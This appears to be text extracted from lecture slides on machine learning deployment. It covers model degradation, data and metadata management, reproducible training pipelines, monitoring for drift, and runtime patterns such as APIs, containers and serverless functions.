ML models degrade silently! (https://towardsdatascience.com/why-machine-learning-models-degrade-in-production- d0f2108e9214, https://www.elastic.co/blog/beware-steep-decline-understanding-model-degradation-machine-learning- models, https://mlinproduction.com/model-retraining/) Data definitions change, people take actions based on model output, other externalities change (different promotions, products, focus…) Models will happily continue to provide predictions, but as concept drift increases, their accuracy and generalization power will decrease over time A solid model governance infrastructure is key! AIops, MLops

104 Common deployment issues

Many of these issues are well known in traditional software engineering

https://www.tecton.ai/blog/devops-ml-data/

In stark contrast to software engineering, data science doesn’t have a well-defined, fully “ “ automated process to get into production quickly.

105 Deployment platforms

Also many in-house solutions: e.g. Uber’s Michelangelo and Manifold, Facebook’s FBLearner flow, Spotify’s Luigi and Airbnb’s Airflow, Netflix’ ML Platform, Airbnb’s Bighead

106 Deployment principles

(Meta)Data management Train-run integration: reproducibility and testing Monitoring, logging and alerting Runtime patterns

107 (Meta)Data management

The issue: during model-development, data sources are typically dispersed and entangled, it is hard to keep track of the data used during a model’s construction. Definitions are not clear are unavailable

A common source of data should be set up and used both during model development and in production Common data preprocessing steps should be incorporated in the data layer instead of being duplicated over different model pipelines Don’t split up the data layer in “raw”, “processed” and “final” stages: data is always raw and never final, focus instead on integrating the different sources in a common platform When using an ad-hoc data source, investigate as early as possible in the development process whether this data source can be ingested in the common layer Consider for every data input whether the data will be available at prediction-time in a timely manner Set up a structured data dictionary containing data definitions and metadata information. This includes data purpose constraint definitions (e.g. GDPR and other regulatory constraints): prevent data elements to be used if not possible Both data and metadata come with versioning: keep historical records available. I.e. you should be able to retrieve the state of the data as when it was during training. This applies to streaming data as well: typically retained in a historical repository as well to be used when (re)training or using models Make sure that predictions of models are ingested in the data layer, if they are to be used as an input for other models 108 Train-run integration: reproducibility and testing

The issue: it is hard to re-train an (outdated model), code used during development is in a separate environment and of lower quality than the code that gets deployed in the production environment

Aim for a reproducible pipeline: the resulting artifact of training code should be directly deployable in production Keep track of each “build” of the model to allow for versioning This eventually allows for models that can be continuously retrained (e.g. when data comes in as a continuous stream: e.g. when using Kafka, Apache Pulsar, Spark Streams) After each re-train, report evaluation scores on a standard test set and allow for comparing different model versions. Report errors whilst building and running the model Decide on a common environment to be used both in development and production (e.g. Python on Anaconda, Spark, H2O, Tensorflow, …), but do allow for flexibility (e.g. using Python libraries) within a well-defined context Isolate the runtime environment per model Allow for an updated model to “run silently” along with the current version so you’re free to test the model for a while and analyze its results (“Canary” or “shadow” deployment) Incorporate as much semantic versioning as possible, e.g. API endpoints “/mymodel/v1/”, “/mymodel/v2/”, “/mymodel/latest/stable/”, “/mymodel/latest/testing/” to provide to end-users and integrators Same for models that run in a scheduled fashion and push their outputs to a data layer: keep versioned data tables 109 Monitoring, logging and alerting

The issue: models fail silently, their accuracy decrease over time, changing data definitions might still lead to models using those data elements suddenly failing

See: Breck, E., Cai, S., Nielsen, E., Salib, M., & Sculley, D. (2016). What’s your ML Test Score? A rubric for ML production systems, set up a common monitoring and logging platform Keep track of inputs provided to the model Do new missing values occur, do the distributions of features change, do new categorical levels appear? How does the system stability index evolve? Keep track of model outputs as well over time Does the probability distribution of the model change over time? Does usage decrease? Do predictions fail? How long does it take to call the model? Repeated backtesting of repeat control experiments are even better, but harder

110 Monitoring, logging and alerting

https://zenml.io/why-ZenML/

https://www.monalabs.io/

111 Monitoring, logging and alerting

https://evidentlyai.com/ 112 Runtime patterns

The issue: where do models run? How will they be exposed in the organization?

Two common patterns: Push: the model is scheduled to run regularly over a batch of data (or a real-time stream of data), with outputs being save to the data layer, e.g. to Hadoop, an FTP server, a relational database table, an Excel file Pull: the model is deployed as an API or microservice to be queried by outside consumers … to be used by web apps, mobile apps, BI dashboards, reports… In both cases, an isolated runtime environment need to be provided!

113 Runtime patterns

Isolated runtime environments

Each deployed version of a model comes with its own environment E.g. Python version, packages used and their version, other supporting executables and libraries Different levels of isolation are possible Environment isolation: e.g. using Python virtual environments, Anaconda environments (e.g. each model runs in its own Anaconda environment) Containerization: e.g. container technologies such as Docker, Kubernetes, Kubeflow (e.g. each model runs in its own Docker container above a shared OS layer) Virtualization: full OS stack is isolated on top of a hardware emulation layer Serverless: models are deployed using e.g. Amazon Lambda, Azure Functions, Google Cloud Functions Typically combined with data layers in the cloud as well Higher isolation levels allow for automatic scaling, easier centralized monitoring and reporting

114 Closing

Trade-off between flexibility and robustness: allowing for experimentation for ad-hoc, new or experimental projects is still fine

Start with the data: make data sources available in a central managed location Once a project matures, move towards the reproducible and governed environment Consider the preferred working environment of data scientists: e.g. many deployment platforms integrate with standard packages such as scikit-learn, Tensorflow and allow developing using Jupyter Notebooks

Not all models end as an API

In many cases, the purpose is to provide a report, dashboard, show insights This is fine Consider link with business intelligence (BI) environment: can model outputs and patterns be easily integrated in existing tooling?

115